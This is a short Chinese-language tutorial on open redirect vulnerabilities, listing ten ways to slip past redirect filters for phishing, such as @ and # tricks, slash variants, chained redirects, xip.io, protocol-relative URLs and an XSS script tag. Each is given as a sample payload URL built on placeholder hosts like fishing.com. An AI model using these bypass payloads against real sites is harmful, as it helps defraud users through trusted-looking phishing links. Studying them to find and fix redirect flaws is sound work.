漏洞描述
系統信任了用戶傳入的任意URL,導致URL跳轉被惡意利用。
URL跳轉漏洞目前在國內總體重視程度還遠遠不夠,不過像騰訊,百度等大型互聯網廠商已經在重視並修復該類型漏洞。目前URL跳轉漏洞利用方式很多,本文主要講解攻擊者是如何繞過安全策略限制實現任意URL跳轉。目前該漏洞多用於欺騙釣魚
上一張案例圖:
漏洞原理
目前不管是瀏覽器,QQ,微信等都對釣魚鏈接做了屏蔽或是標記處理。猜測原理是通過大數據處理識別分析得出的結果。但是如果通過URL跳轉漏洞,能提高用戶信任度的同時,還能繞過防護,達到欺詐目的。
限制繞過
我們假設:
跳轉鏈接http://www.xxx.com?url=http://test.com
其中http://test.com
爲正常跳轉鏈接
惡意釣魚鏈接爲fishing.com
,ip地址爲192.168.1.1
1 @符號繞過
http://www.xxx.com?url=http://[email protected]
2 問號繞過
http://www.xxx.com?url=http://fishing.com?test.com
3 # 繞過
http://www.xxx.com?url=http://fishing.com#test.com
4 正反斜槓繞過
http://www.xxx.com?url=http://fishing.com/test.com
http://www.xxx.com?url=http://fishing.com\test.com
http://www.xxx.com?url=http://fishing.com\\test.com
http://www.xxx.com?url=http://fishing.com\.test.com
5 白名單
部分網站對跳轉做了內容檢測,比如白名單允許包含fish字符的鏈接通過,那麼我們就能找包含fish的鏈接就行跳轉。
http://www.xxx.com?url=http://fishing.com
6 多重跳轉
例如 網站存在跳轉http://www.xxx.com?url=http://test.com
,但是限制僅限於xxx.com
,那麼我們爲了達到目的可以先跳轉到xxx.com
,在跳轉到fishing.com
http://www.xxx.com?url=http://test.com?url=fishing.com
7 功能觸發跳轉
某些時候在修改鏈接後加載沒反應,可能需要觸發某功能來進行跳轉,比如登錄,刪除等,具體看跳抓鏈接處於那個功能點。
8 xip.io繞過
http://www.xxx.com?url=http://test.com.192.168.1.1.xip.io
9 協議繞過
刪除或切換http和https,或者增加多個斜槓
http://www.xxx.com?url=//fishing.com#test.com
http://www.xxx.com?url=///fishing.com#test.com
10 xss跳轉
xss情況比較多,根據實際情況而定
<script src=https://fishing.com></script>